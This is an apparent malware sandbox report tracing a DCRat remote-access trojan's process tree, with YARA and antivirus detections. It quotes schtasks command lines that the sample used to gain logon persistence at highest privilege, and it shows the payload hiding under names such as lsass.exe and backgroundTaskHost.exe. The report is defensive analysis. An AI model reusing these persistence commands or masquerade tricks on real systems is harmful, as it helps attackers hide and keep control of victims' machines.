                Reputation:high

                General

                Start time:19:14:43
                Start date:14/01/2022
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\system32\cmd.exe /c ""C:\refhostperfdllCommon\rSX3yp.bat" "
                Imagebase:0x11d0000
                File size:232960 bytes
                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:19:14:44
                Start date:14/01/2022
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff724c50000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:19:14:44
                Start date:14/01/2022
                Path:C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe
                Wow64 process (32bit):false
                Commandline:C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe
                Imagebase:0xda0000
                File size:1005056 bytes
                MD5 hash:4E66AE5C311A1AADC1241790C112525F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.713915438.0000000013171000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000007.00000002.714469777.0000000013283000.00000004.00000001.sdmp, Author: Florian Roth
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                Reputation:low

                General

                Start time:19:14:51
                Start date:14/01/2022
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "wjIuhVBtfHXnMCZlWDoj" /sc ONLOGON /tr "'C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe'" /rl HIGHEST /f
                Imagebase:0x7ff7e8c30000
                File size:226816 bytes
                MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:19:14:52
                Start date:14/01/2022
                Path:C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe
                Wow64 process (32bit):false
                Commandline:C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe
                Imagebase:0x2b0000
                File size:1005056 bytes
                MD5 hash:4E66AE5C311A1AADC1241790C112525F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000A.00000002.727189288.0000000012551000.00000004.00000001.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                Reputation:low

                General

                Start time:19:14:52
                Start date:14/01/2022
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Windows\System32\umdmxfrm\backgroundTaskHost.exe'" /rl HIGHEST /f
                Imagebase:0x7ff7e8c30000
                File size:226816 bytes
                MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:19:14:53
                Start date:14/01/2022
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Documents and Settings\user\Pictures\Camera Roll\lsass.exe'" /rl HIGHEST /f
                Imagebase:0x7ff7e8c30000
                File size:226816 bytes
                MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:19:14:55
                Start date:14/01/2022
                Path:C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe
                Wow64 process (32bit):false
                Commandline:"C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe"
                Imagebase:0x980000
                File size:1005056 bytes
                MD5 hash:4E66AE5C311A1AADC1241790C112525F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000D.00000002.732824643.0000000012DE1000.00000004.00000001.sdmp, Author: Joe Security
                Reputation:low

                General

                Start time:19:14:55
                Start date:14/01/2022
                Path:C:\Users\user\Pictures\Camera Roll\lsass.exe
                Wow64 process (32bit):false
                Commandline:C:\Documents and Settings\user\Pictures\Camera Roll\lsass.exe
                Imagebase:0x7c0000
                File size:1005056 bytes
                MD5 hash:4E66AE5C311A1AADC1241790C112525F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000F.00000002.743281064.0000000012CB1000.00000004.00000001.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                Reputation:low

                General

                Start time:19:15:05
                Start date:14/01/2022
                Path:C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe
                Wow64 process (32bit):false
                Commandline:"C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe"
                Imagebase:0x30000
                File size:1005056 bytes
                MD5 hash:4E66AE5C311A1AADC1241790C112525F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000012.00000002.753888327.0000000012461000.00000004.00000001.sdmp, Author: Joe Security
                Reputation:low

                General

                Start time:19:15:21
                Start date:14/01/2022
                Path:C:\Users\user\Pictures\Camera Roll\lsass.exe
                Wow64 process (32bit):false
                Commandline:"C:\Documents and Settings\user\Pictures\Camera Roll\lsass.exe"
                Imagebase:0xb00000
                File size:1005056 bytes
                MD5 hash:4E66AE5C311A1AADC1241790C112525F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.935822946.0000000012FB1000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000014.00000002.935944649.0000000013028000.00000004.00000001.sdmp, Author: Florian Roth
                Reputation:low

                Disassembly

                Code Analysis

                Reset < >